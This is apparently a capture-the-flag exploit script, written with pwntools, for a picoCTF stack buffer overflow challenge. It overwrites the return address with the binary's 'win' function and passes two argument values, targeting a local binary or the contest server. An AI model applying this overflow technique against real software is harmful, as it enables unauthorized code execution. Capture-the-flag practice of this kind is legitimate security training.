#!/usr/bin/env nix-shell
#!nix-shell -p python3 -i python3 python3Packages.pwntools

from pwn import *

exe = ELF("./vuln")

context.binary = exe

ADDR, PORT, *_ = "saturn.picoctf.net 55214".split()

def conn():
    if args.REMOTE:
        r = remote(ADDR, PORT)
    else:
        r = process([exe.path])

    return r

def main():
  r = conn()

  print(r.recvuntil(b"Please enter your string:"))
  offset = 112 # found with pwndbg
  payload = b'A' * offset + p32(exe.sym.win) + b'B'*4 + p32(0xCAFEF00D) + p32(0xF00DF00D)
  r.sendline(payload)
  print(r.recvall())
  r.close()

if __name__ == "__main__":
    main()